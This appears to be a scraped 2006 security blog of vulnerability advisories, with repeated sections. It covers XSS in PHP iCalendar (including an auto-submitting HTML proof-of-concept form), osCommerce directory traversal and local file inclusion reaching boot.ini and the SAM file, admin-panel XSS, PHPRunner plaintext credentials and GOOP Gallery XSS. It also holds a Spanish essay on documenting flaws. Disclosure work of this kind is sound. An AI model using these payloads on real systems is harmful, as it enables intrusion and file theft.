#####################################################
PHP icalendar multiple variable cross site scripting
Vendor url:http://phpicalendar.net/
Advisore:http://lostmon.blogspot.com/2006/12/
php-icalendar-multiple-variable-cross.html
Vendor notify: YES Exploit included:YES
OSVDB ID:32493,32494,32495,32496,32497,32498,32499,32500
Securitytracker:1017449
Secunia:SA23499
BID:21792
#####################################################
PHP icalendar contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple params upon submission to multiple scripts.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server, leading
to a loss of integrity.
######################
versions
######################
all of this versions have been tested
Posible other versions are prone vulnerables.
PHP iCalendar 2.23 rc1
PHP iCalendar 2.22
PHP icalendar 2.0 Beta
PHP iCalendar 1.1
######################
Solution:
######################
No solution was available at this time!!
##################
Time Line
##################
Discovered:20-12-2006
Vendor notify:25-12-2006
Vendor response:
Disclosure:27-12-2006
###################
EXAMPLES & PoC
###################
http://localhost/phpicalendar/day.php?cal=
all_calendars_combined971&getdate=
20061225"><script>alert()</script>
http://localhost/phpicalendar/month.php?cal=
all_calendars_combined971&getdate=20061225
"><script>alert()</script>
http://localhost/phpicalendar/year.php?cal=
all_calendars_combined971&getdate=20061225
"><script>alert()</script>
http://localhost/phpicalendar/week.php?cal=
all_calendars_combined971&getdate=20061225
"><script>alert()</script>
http://localhost/phpicalendar/day.php?cpath=
%22%3E%3Cscript%3Edocument.write(document.domain)
%3C/script%3E&getdate=20061225&cal%5B%5D=
Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work
http://localhost/phpicalendar/month.php?cpath=
%22%3E%3Cscript%3Edocument.write(document.domain
)%3C/script%3E&getdate=20061225&cal%5B%5D
=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work
http://localhost/phpicalendar/year.php?cpath=
%22%3E%3Cscript%3Edocument.write(document.domain)
%3C/script%3E&getdate=20061225&cal%5B%5D=
Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work
http://localhost/phpicalendar/week.php?cpath=
%22%3E%3Cscript%3Edocument.write(document.domain)
%3C/script%3E&getdate=20061225&cal%5B%5D=
Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work
----
http://localhost/phpicalendar/search.php?cpath=
&cal=Home%2CUS%2BHolidays%2CWork&getdate=
19700102&query=ss"><script>alert()</script>&submit.x=11&submit.y=15
http://localhost/phpicalendar/search.php?cpath=
"><script>alert()</script>&
cal=Home%2CUS%2BHolidays2CWork&getdate=
19700102&query=ss&submit.x=11&submit.y=12
http://localhost/phpicalendar/search.php?cpath=&
cal=Home%2CUS%2BHolidays%2CWork&getdate=19700102
"><script>alert()</script>&
query=ss&submit.x=11&submit.y=12
----
http://localhost/phpicalendar/rss/index.php?cal=Home
,US+Holidays,Work&getdate=20061225"><
script>alert()</script>
http://localhost/phpicalendar/print.php?cal=Home,
US+Holidays,Work&getdate=20061225%22%3E%3Cscr
ipt%3Ealert()%3C/script%3E&printview=day
################################
Proof of concept for preferences
################################
Multiple param XSS in preferences.php
Use the proof and modify some params
create a evil cookie before submit :)
http://localhost/phpicalendar/preferences.php?cal=
Home,US+Holidays,Work&getdate=20061227%22%3E%3
Cscript%3Ealert()%3C/script%3E
<html>
<head></head>
<body>
<title>PHP icalendar XSS in preferences.php PoC</title>
<p><a href="http://phpicalendar.net/" target="_BLANK">PHP
icalendar</a> <= 2.23 rc1 preferences.php XSS Proof Of concept By <a
href="http://Lostmon.blogspot.com" target="_BLANK">Lostmon</a></p>
<p>Modify the target host , by default http://localhost/</P>
<br /><br /><form method='post'
action='http://localhost/phpicalendar/preferences.php?action=setcookie'>
cookie_language: <input input='text' value='Spanish'
name='cookie_language' style='width: 80%' /><br>
cookie_calendar: <input input='text'
value='all_calendars_combined971' name='cookie_calendar' style='width:
80%' /><br>
cpath: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='cpath' style='width: 80%' /><br>
cookie_view: <input input='text' value='day' name='cookie_view'
style='width: 80%' /><br>
cookie_time: <input input='text' value='0700' name='cookie_time'
style='width: 80%' /><br>
cookie_startday: <input input='text' value='Sunday'
name='cookie_startday' style='width: 80%' /><br>
cookie_style: <input input='text' value='default' name='cookie_style'
style='width: 80%' /><br>
unset: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='unset' style='width: 80%' /><br>
set: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='set' style='width: 80%' /><br>
<input type='submit' value='submit' /><br>
</form><hr />
<textarea style='width: 80%; height: 50%;'>
<form method='post'
action='http://localhost/phpicalendar/preferences.php?action=setcookie'>
cookie_language: <input input='text' value='Spanish'
name='cookie_language' style='width: 80%' /><br>
cookie_calendar: <input input='text'
value='all_calendars_combined971' name='cookie_calendar' style='width:
80%' /><br>
cpath: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='cpath' style='width: 80%' /><br>
cookie_view: <input input='text' value='day' name='cookie_view'
style='width: 80%' /><br>
cookie_time: <input input='text' value='0700' name='cookie_time'
style='width: 80%' /><br>
cookie_startday: <input input='text' value='Sunday'
name='cookie_startday' style='width: 80%' /><br>
cookie_style: <input input='text' value='default' name='cookie_style'
style='width: 80%' /><br>
unset: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='unset' style='width: 80%' /><br>
set: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='set' style='width: 80%' /><br>
<input type='submit' value='submit' /><br>
</form>
<script>
document.forms[0].submit()
</script>
</textarea>
</body>
</html>
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Indexacion de vulnerabilidades
Thursday, December 21, 2006
########################################
Indexacion de algunas vulnerabilidades
########################################
Indexacion de algunas vulnerabilidades
########################################
En los últimos años, después de profundizar en la forma, en que
las nuevas vulnerabilidades son descubiertas y publicadas, desde
el punto de vista de aquel que las descubre, y las publica.
Cual es en si el proceso que se sigue, desde que esa vulnerabilidad
es descubierta, hasta que es publicada por las numerosas listas de
seguridad, cómo son añadidas a las bases de datos de esas listas,
cómo se documentan, y por ultimo como son publicadas, se me
ocurren varias consideraciones a tener en cuenta…
Se ha intentado durante mucho tiempo una estandarización,
para poder clasificar los archivos de fallas, de una manera
en la cual fuese fácil reconocerlas (causa del mismo), saber
el tipo de ataque que puede llevarse a cabo (Impacto) Y su
posible mitigación o solución.
Me gustaría hacer un inciso sobre todo en la forma en la que
se suelen tratar una serie de vulnerabilidades, las cuales
suelen ser explotables a través de la URL o en si digamos en
la modificación de los valores de alguna de las variables
o parámetros de la URL.
Las vulnerabilidades sobre las que me gustaría hacer un
comentario son las siguientes:
Cross-site Scripting, SQL injection, traversal arbitrary file access
y alguno que me dejo en el tintero.
Todos estos agujeros suelen ser explotados a través de la URL,
y casi todos hacen uso de las diferentes variables, pasadas
por la URL de una página a otra en las peticiones POST o GET
de un sitio Web.
Si tomamos por ejemplo una URL con varios parámetros en la
cual hubiese uno de ellos vulnerable...
http://[victim]/folder/file.php?var1=value1&var2=[XSS-CODE]
&var3=value3
Esta vulnerabilidad seria seguramente llamada...
[Producto afectado]+ [Nombre de la variable]+ [agujero]
Con lo cual diríamos que nuestro producto es vulnerable en
la variable var2 a un bug de tipo Cross site scripting.
Cuando esta vulnerabilidad llega a las listas de seguridad, estas hacen
eco de ella y le añaden el archivo afectado, si el descubridor no lo
especifica, con lo cual nuestra vulnerabilidad en su descripción diría
que el producto XXX es vulnerable en la variable var2 a cross site
scripting al ser enviada al archivo 'file.php'
¿Que pasaría si dicha variable no estuviera definida en esa pagina?
que viniese de otra pagina de la que hemos echo un POST o que
estuviese en otro archivo y este fuese incluido en la pagina que
supuestamente es la vulnerable?
Seguramente nos volveríamos locos a la hora de intentar localizar el
fallo y deberíamos mirar muchos mas archivos de los que en realidad
necesitamos para fijar esa vulnerabilidad en una determinada llamada
a la variable afectada.
Seguramente al desarrollador le costaría mas encontrar exactamente
el error, pues en si directamente le estamos dando información
incorrecta sobre donde se haya situada la vulnerabilidad al
facilitar un archivo donde supuestamente la variable falla.
Si ponemos como ejemplo un portal tipo PHP-NUKE el cual en
el ejemplo,la primera variable llama a un modulo, la segunda
proviene del modulo llamado.
http://[PHP-NUKE]/modules.php?name=News&new_topic=1
Si existiese una vulnerabilidad en la segunda variable, esta
igualmente seria descrita por las listas como variable
new_topic es vulnetable al ser enviada al archivo modules.php
pero esta vulnerabilidad podría venir(como casi siempre es seguro)
del archivo News.php situado en el directorio de módulos del PHP-NUKE.
El desarrollador seguramente fijaría esa variable en la página
mencionada, pero seguramente esa misma variable desde otro punto
del portal, seria también vulnerable por no haberlo corregido
directamente donde se inicializa esa variable o parámetro, con
lo cual en si esa vulnerabilidad podría dividirse en dos.
Si las listas de seguridad indicasen que la variable new_topic
es vulnerable a cross site scripting al ser enviada a modules.php
y esavariable esta definida en el archivo news.php…
¿no seria mas correcto decir que la variable new_topic es
vulnerable en los dos puntos en lugar de solo en el primero?
Este tipo de "errores" al documentar las vulnerabilidades puede
llevar a creer que muchas de las vulnerabilidades del tipo descrito,
pueden estar en las listas expuestas de forma incorrecta, o pueden
llevar a error, pues en si la mayoría de las veces la definición
de la misma es errónea.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
las nuevas vulnerabilidades son descubiertas y publicadas, desde
el punto de vista de aquel que las descubre, y las publica.
Cual es en si el proceso que se sigue, desde que esa vulnerabilidad
es descubierta, hasta que es publicada por las numerosas listas de
seguridad, cómo son añadidas a las bases de datos de esas listas,
cómo se documentan, y por ultimo como son publicadas, se me
ocurren varias consideraciones a tener en cuenta…
Se ha intentado durante mucho tiempo una estandarización,
para poder clasificar los archivos de fallas, de una manera
en la cual fuese fácil reconocerlas (causa del mismo), saber
el tipo de ataque que puede llevarse a cabo (Impacto) Y su
posible mitigación o solución.
Me gustaría hacer un inciso sobre todo en la forma en la que
se suelen tratar una serie de vulnerabilidades, las cuales
suelen ser explotables a través de la URL o en si digamos en
la modificación de los valores de alguna de las variables
o parámetros de la URL.
Las vulnerabilidades sobre las que me gustaría hacer un
comentario son las siguientes:
Cross-site Scripting, SQL injection, traversal arbitrary file access
y alguno que me dejo en el tintero.
Todos estos agujeros suelen ser explotados a través de la URL,
y casi todos hacen uso de las diferentes variables, pasadas
por la URL de una página a otra en las peticiones POST o GET
de un sitio Web.
Si tomamos por ejemplo una URL con varios parámetros en la
cual hubiese uno de ellos vulnerable...
http://[victim]/folder/file.php?var1=value1&var2=[XSS-CODE]
&var3=value3
Esta vulnerabilidad seria seguramente llamada...
[Producto afectado]+ [Nombre de la variable]+ [agujero]
Con lo cual diríamos que nuestro producto es vulnerable en
la variable var2 a un bug de tipo Cross site scripting.
Cuando esta vulnerabilidad llega a las listas de seguridad, estas hacen
eco de ella y le añaden el archivo afectado, si el descubridor no lo
especifica, con lo cual nuestra vulnerabilidad en su descripción diría
que el producto XXX es vulnerable en la variable var2 a cross site
scripting al ser enviada al archivo 'file.php'
¿Que pasaría si dicha variable no estuviera definida en esa pagina?
que viniese de otra pagina de la que hemos echo un POST o que
estuviese en otro archivo y este fuese incluido en la pagina que
supuestamente es la vulnerable?
Seguramente nos volveríamos locos a la hora de intentar localizar el
fallo y deberíamos mirar muchos mas archivos de los que en realidad
necesitamos para fijar esa vulnerabilidad en una determinada llamada
a la variable afectada.
Seguramente al desarrollador le costaría mas encontrar exactamente
el error, pues en si directamente le estamos dando información
incorrecta sobre donde se haya situada la vulnerabilidad al
facilitar un archivo donde supuestamente la variable falla.
Si ponemos como ejemplo un portal tipo PHP-NUKE el cual en
el ejemplo,la primera variable llama a un modulo, la segunda
proviene del modulo llamado.
http://[PHP-NUKE]/modules.php?name=News&new_topic=1
Si existiese una vulnerabilidad en la segunda variable, esta
igualmente seria descrita por las listas como variable
new_topic es vulnetable al ser enviada al archivo modules.php
pero esta vulnerabilidad podría venir(como casi siempre es seguro)
del archivo News.php situado en el directorio de módulos del PHP-NUKE.
El desarrollador seguramente fijaría esa variable en la página
mencionada, pero seguramente esa misma variable desde otro punto
del portal, seria también vulnerable por no haberlo corregido
directamente donde se inicializa esa variable o parámetro, con
lo cual en si esa vulnerabilidad podría dividirse en dos.
Si las listas de seguridad indicasen que la variable new_topic
es vulnerable a cross site scripting al ser enviada a modules.php
y esavariable esta definida en el archivo news.php…
¿no seria mas correcto decir que la variable new_topic es
vulnerable en los dos puntos en lugar de solo en el primero?
Este tipo de "errores" al documentar las vulnerabilidades puede
llevar a creer que muchas de las vulnerabilidades del tipo descrito,
pueden estar en las listas expuestas de forma incorrecta, o pueden
llevar a error, pues en si la mayoría de las veces la definición
de la misma es errónea.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Oscommerce traversal arbitrary file access
Thursday, December 07, 2006
############################################
Oscommerce traversal arbitrary file access
Vendor:http://www.oscommerce.com/about/news,125
Advisore:http://lostmon.blogspot.com/2006/12
/oscommerce-traversal-arbitrary-file.html
Vendor notify:NO Exploit available: YES
Securitytracker:1017353
BID:21477
###########################################
osCommerce contains a flaw that allows a remote traversal
arbitrary file access.This flaw exists because the application
does not validate filter variable upon submission to
admin/templates_boxes_layout.php script.This could allow a
remote authenticated administrator to create a specially
crafted URL that would execute '../' directory traversal
characters to view files on the target system with
the privileges of the target web service.
####################
versions
####################
Oscommerce 3.0a3
###################
SOLUTION
###################
No solution was available at this time.
################
timeline
################
Discovered:11-11-2006
vendor notify:------
vendor response:
disclosure:07-12-2006
#################
Examples
#################
######################
traversal file access
######################
wen we try to open
http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=boxes&filter=[SOME WORD]&lID=27
the aplication returns a full path disclosure and
returns this error:
Warning: require(includes/templates/[SOME WORD].php) [function.require]:
failed to open stream: No such file or directory in C:\AppServ\www oscommerce\admin\templates\pages\templates_boxes_layout.php on line 13
Fatal error: require() [function.require]: Failed opening required
'includes/templates/[SOME WORD].php' (include_path='.;C:\php5\pear')
in C:\AppServ\www\oscommerce\admin\templates\pages\templates_
boxes_layout.php on line 13
the aplication add the .php extension to our [SOME WORD] ummm
and it searh for the file in a folder inside webserver
we can include any php file located on the web server
in the aplication and it is executed(local file inclusion)
http://[victim]/admin/templates_boxes_layout.php?
set=boxes&filter=../../our_evil_php_file&lID=27
if we try to read a file outside webserver folder with a non php
extension can try for test this...
&filter=../../../../file.extension%00 for look for example boot.ini
in a windows system
http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=boxes&filter=../../../../BOOT.INI%00&lID=27
http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=content&filter=../../../../windows/repair/sam%00&lID=27
#####################
Cross site scripting
#####################
http://localhost/oscommerce/admin/modules.php?set=shipping
%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
http://localhost/definitiva/admin/customers.php?selected_box=customers
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
http://localhost/oscommerce/admin/languages_definitions.php?lID=1
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
http://localhost/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT
%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Oscommerce traversal arbitrary file access
Vendor:http://www.oscommerce.com/about/news,125
Advisore:http://lostmon.blogspot.com/2006/12
/oscommerce-traversal-arbitrary-file.html
Vendor notify:NO Exploit available: YES
Securitytracker:1017353
BID:21477
###########################################
osCommerce contains a flaw that allows a remote traversal
arbitrary file access.This flaw exists because the application
does not validate filter variable upon submission to
admin/templates_boxes_layout.php script.This could allow a
remote authenticated administrator to create a specially
crafted URL that would execute '../' directory traversal
characters to view files on the target system with
the privileges of the target web service.
####################
versions
####################
Oscommerce 3.0a3
###################
SOLUTION
###################
No solution was available at this time.
################
timeline
################
Discovered:11-11-2006
vendor notify:------
vendor response:
disclosure:07-12-2006
#################
Examples
#################
######################
traversal file access
######################
wen we try to open
http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=boxes&filter=[SOME WORD]&lID=27
the aplication returns a full path disclosure and
returns this error:
Warning: require(includes/templates/[SOME WORD].php) [function.require]:
failed to open stream: No such file or directory in C:\AppServ\www oscommerce\admin\templates\pages\templates_boxes_layout.php on line 13
Fatal error: require() [function.require]: Failed opening required
'includes/templates/[SOME WORD].php' (include_path='.;C:\php5\pear')
in C:\AppServ\www\oscommerce\admin\templates\pages\templates_
boxes_layout.php on line 13
the aplication add the .php extension to our [SOME WORD] ummm
and it searh for the file in a folder inside webserver
we can include any php file located on the web server
in the aplication and it is executed(local file inclusion)
http://[victim]/admin/templates_boxes_layout.php?
set=boxes&filter=../../our_evil_php_file&lID=27
if we try to read a file outside webserver folder with a non php
extension can try for test this...
&filter=../../../../file.extension%00 for look for example boot.ini
in a windows system
http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=boxes&filter=../../../../BOOT.INI%00&lID=27
http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=content&filter=../../../../windows/repair/sam%00&lID=27
#####################
Cross site scripting
#####################
http://localhost/oscommerce/admin/modules.php?set=shipping
%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
http://localhost/definitiva/admin/customers.php?selected_box=customers
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
http://localhost/oscommerce/admin/languages_definitions.php?lID=1
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
http://localhost/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT
%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Oscommerce Multiple XSS in admin section
Monday, November 20, 2006
##########################################
Oscommerce Multiple XSS in admin section.
Vendor url:Http://www.oscommerce.com
Advisore:http://lostmon.blogspot.com/2006/11/
oscommerce-multiple-xss-in-admin.html
Vendor notify:YES Exploit available: YES
OSVDB ID:33212,33213,33214,33216,33217,33218,
Securitytracker:1017269
Secunia:SA22275
##########################################
osCommerce contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple params upon submission to multiple scripts
in /admin folder.This could allow a user to create a specially
crafted URL that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server,
leading to a loss of integrity.
####################
versions
####################
Oscommerce -2.2ms2-060817
###################
SOLUTION
###################
No solution was available at this time.
################
timeline
################
Discovered:29-10-2006
vendor notify:20-11-2006
vendor response
disclosure:21-11-2006
#################
Examples
#################
If the server have auth implemented
for exploit all of this flaws you
need to login , before.
-------------------------------
gID param in configuration.php
-------------------------------
http://[Victim]/catalog/admin/configuration.php?
gID=1">[XSS-CODE]&cID=3
--------------------------
Set param in modules.php
--------------------------
http://localhost/catalog/admin/modules.php?selected_box=modules
&set=payment">[XSS-CODE]&osCAdminID=034e6def71e10f0ca58029e93fd361e5
http://localhost/catalog/admin/modules.php?set=payment
">[XSS-CODE]&module=pm2checkout
http://localhost/catalog/admin/modules.php?set=ordertotal
&module=ot_loworderfee">[XSS-CODE]&action=edit
--------------------------------------------------
option_order_by ,value_page ,option_page ,products
_options_name in products_attributes.php
--------------------------------------------------
http://[Victim]/catalog/admin/products_attributes.php?
action=update_option&option_id=1&option_order_by=">
[XSS-CODE]&products_options_id&option_page=1
http://[Victim]/definitiva/admin/products_attributes.php?
option_order_by=products_options_id&value_page=2">[XSS-CODE]
http://[Victim]/definitiva/admin/products_attributes.php?
option_page=1&option_order_by=products_options_name">[XSS-CODE]
http://[Victim]/definitiva/admin/products_attributes.php?
action=update_option&option_id=1&option_order_by=products
_options_id&option_page=1">[XSS-CODE]
http://[Victim]/catalog/admin/products_attributes.php?
action=update_option&option_id=1&option_order_by=products
_options_id&option_page=1">[XSS-CODE]
----------------------------------------------------
lID param in languages.php
---------------------------------------------
http://localhost/definitiva/admin/languages.php?page=1&
lID=3">[XSS-CODE]&action=new
-------------------------------
selected_box,cID in customers.php
-------------------------------
http://localhost/definitiva/admin/customers.php?page=1
&cID=1[XSS-CODE]&action=edit
http://[Victim]/catalog/admin/customers.php?selected_box=
customers">[XSS-CODE]
-------------------------------
spage,zID,sID in geo_zones.php
-------------------------------
http://localhost/definitiva/admin/geo_zones.php?zpage=1&zID=1&
action=list&spage=1">[XSS-CODE]&sID=1&saction=edit
http://localhost/definitiva/admin/geo_zones.php?zpage=1&
zID=2">[XSS-CODE]&action=list&spage=1&sID=2&saction=edit
http://localhost/definitiva/admin/geo_zones.php?zpage=1
&zID=1&action=list&spage=1&sID=1">[XSS-CODE]&saction=new
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Oscommerce Multiple XSS in admin section.
Vendor url:Http://www.oscommerce.com
Advisore:http://lostmon.blogspot.com/2006/11/
oscommerce-multiple-xss-in-admin.html
Vendor notify:YES Exploit available: YES
OSVDB ID:33212,33213,33214,33216,33217,33218,
Securitytracker:1017269
Secunia:SA22275
##########################################
osCommerce contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple params upon submission to multiple scripts
in /admin folder.This could allow a user to create a specially
crafted URL that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server,
leading to a loss of integrity.
####################
versions
####################
Oscommerce -2.2ms2-060817
###################
SOLUTION
###################
No solution was available at this time.
################
timeline
################
Discovered:29-10-2006
vendor notify:20-11-2006
vendor response
disclosure:21-11-2006
#################
Examples
#################
If the server have auth implemented
for exploit all of this flaws you
need to login , before.
-------------------------------
gID param in configuration.php
-------------------------------
http://[Victim]/catalog/admin/configuration.php?
gID=1">[XSS-CODE]&cID=3
--------------------------
Set param in modules.php
--------------------------
http://localhost/catalog/admin/modules.php?selected_box=modules
&set=payment">[XSS-CODE]&osCAdminID=034e6def71e10f0ca58029e93fd361e5
http://localhost/catalog/admin/modules.php?set=payment
">[XSS-CODE]&module=pm2checkout
http://localhost/catalog/admin/modules.php?set=ordertotal
&module=ot_loworderfee">[XSS-CODE]&action=edit
--------------------------------------------------
option_order_by ,value_page ,option_page ,products
_options_name in products_attributes.php
--------------------------------------------------
http://[Victim]/catalog/admin/products_attributes.php?
action=update_option&option_id=1&option_order_by=">
[XSS-CODE]&products_options_id&option_page=1
http://[Victim]/definitiva/admin/products_attributes.php?
option_order_by=products_options_id&value_page=2">[XSS-CODE]
http://[Victim]/definitiva/admin/products_attributes.php?
option_page=1&option_order_by=products_options_name">[XSS-CODE]
http://[Victim]/definitiva/admin/products_attributes.php?
action=update_option&option_id=1&option_order_by=products
_options_id&option_page=1">[XSS-CODE]
http://[Victim]/catalog/admin/products_attributes.php?
action=update_option&option_id=1&option_order_by=products
_options_id&option_page=1">[XSS-CODE]
----------------------------------------------------
lID param in languages.php
---------------------------------------------
http://localhost/definitiva/admin/languages.php?page=1&
lID=3">[XSS-CODE]&action=new
-------------------------------
selected_box,cID in customers.php
-------------------------------
http://localhost/definitiva/admin/customers.php?page=1
&cID=1[XSS-CODE]&action=edit
http://[Victim]/catalog/admin/customers.php?selected_box=
customers">[XSS-CODE]
-------------------------------
spage,zID,sID in geo_zones.php
-------------------------------
http://localhost/definitiva/admin/geo_zones.php?zpage=1&zID=1&
action=list&spage=1">[XSS-CODE]&sID=1&saction=edit
http://localhost/definitiva/admin/geo_zones.php?zpage=1&
zID=2">[XSS-CODE]&action=list&spage=1&sID=2&saction=edit
http://localhost/definitiva/admin/geo_zones.php?zpage=1
&zID=1&action=list&spage=1&sID=1">[XSS-CODE]&saction=new
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
PHPRunner database credentials disclosure
Monday, November 13, 2006
##########################################
PHPRunner database credentials disclosure
Vendor url:http://www.xlinesoft.com/phprunner/
Advisore:http://lostmon.blogspot.com/2006/11/
phprunner-database-credentials.html
Vendor notify:yes exploit available:yes
OSVDB ID:30363
Securitytracker:1017218
Secunia:SA22863
BID:21054
##########################################
Description:
PHPRunner builds visually appealing web interface
for any local or remote MySQL, MS Access, SQL Server
and Oracle databases. Your web site visitors will be
able to easily search, add, edit, delete and export
data in your database. Advanced security options allow
to build password-protected members only Web sites
easily. PHPRunner is simple to learn so you can build
your first project in just fifteen minutes.
Vulnerability:
PHPRunner contains a flaw that allow local users
to view all credentials stored in PHPRunner for work.
This flaw exist because the aplication store the
database server, database names,users and passwords
in plain text in a file located in windows folder.
A local user could access directly to
\windows\PHPRunner.ini and obtain all information.
versions
this prove is tested on version 3.1
solution:
No solution was available at this time.
Timeline:
Discovered:21-10-2006
vendor notify:13-11-2006
vendor response:13-11-2006
disclosure:13-11-2006
example:
Open c:\windows\PHPRunner.ini
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
PHPRunner database credentials disclosure
Vendor url:http://www.xlinesoft.com/phprunner/
Advisore:http://lostmon.blogspot.com/2006/11/
phprunner-database-credentials.html
Vendor notify:yes exploit available:yes
OSVDB ID:30363
Securitytracker:1017218
Secunia:SA22863
BID:21054
##########################################
Description:
PHPRunner builds visually appealing web interface
for any local or remote MySQL, MS Access, SQL Server
and Oracle databases. Your web site visitors will be
able to easily search, add, edit, delete and export
data in your database. Advanced security options allow
to build password-protected members only Web sites
easily. PHPRunner is simple to learn so you can build
your first project in just fifteen minutes.
Vulnerability:
PHPRunner contains a flaw that allow local users
to view all credentials stored in PHPRunner for work.
This flaw exist because the aplication store the
database server, database names,users and passwords
in plain text in a file located in windows folder.
A local user could access directly to
\windows\PHPRunner.ini and obtain all information.
versions
this prove is tested on version 3.1
solution:
No solution was available at this time.
Timeline:
Discovered:21-10-2006
vendor notify:13-11-2006
vendor response:13-11-2006
disclosure:13-11-2006
example:
Open c:\windows\PHPRunner.ini
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
GOOP Gallery 'image' param Cross-site scripting
Monday, October 16, 2006
################################################
GOOP Gallery 'image' param Cross-site scripting
Vendor url:http://www.webgeneius.com
Advisore:http://lostmon.blogspot.com/2006/10/
goop-gallery-image-param-cross-site.html
Vendor notify: YES Exploit available: YES
securitytracker:1017081
Secunia: SA22258
BID:20554
################################################
GOOP Gallery contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate 'image' param upon submission to index.php script.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server, leading
to a loss of integrity.
################
Versions
################
GOOP Gallery 2.0 vulnerable
GOOP Gallery 2.0.3 not Vulnerable
################
Solution
################
Upgrade to GOOP gallery 2.0.3as soon as possible.
http://webgeneius.com/index.php?mod=blog&id=49
Download GG2.0.3:
http://webgeneius.com/downloads/gg2.0.3.zip
################
Timeline
################
Discovered:09-10-2006
Vendor notify:14-10-2006
Vendor response:15-10-2006
Vendor Fix: 16-10-2006
Disclosure: 16-10-2006
##############
Example
##############
http://Victim/goopgallery/index.php?next=%BB&gallery=demo+gallery+1
&image=Bunny.JPG">[XSS-CODE]
http://Victim/goopgallery/index.php?gallery=demo+gallery+1
&image=Bunny.JPG">[XSS-CODE]
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
GOOP Gallery 'image' param Cross-site scripting
Vendor url:http://www.webgeneius.com
Advisore:http://lostmon.blogspot.com/2006/10/
goop-gallery-image-param-cross-site.html
Vendor notify: YES Exploit available: YES
securitytracker:1017081
Secunia: SA22258
BID:20554
################################################
GOOP Gallery contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate 'image' param upon submission to index.php script.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server, leading
to a loss of integrity.
################
Versions
################
GOOP Gallery 2.0 vulnerable
GOOP Gallery 2.0.3 not Vulnerable
################
Solution
################
Upgrade to GOOP gallery 2.0.3as soon as possible.
http://webgeneius.com/index.php?mod=blog&id=49
Download GG2.0.3:
http://webgeneius.com/downloads/gg2.0.3.zip
################
Timeline
################
Discovered:09-10-2006
Vendor notify:14-10-2006
Vendor response:15-10-2006
Vendor Fix: 16-10-2006
Disclosure: 16-10-2006
##############
Example
##############
http://Victim/goopgallery/index.php?next=%BB&gallery=demo+gallery+1
&image=Bunny.JPG">[XSS-CODE]
http://Victim/goopgallery/index.php?gallery=demo+gallery+1
&image=Bunny.JPG">[XSS-CODE]
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
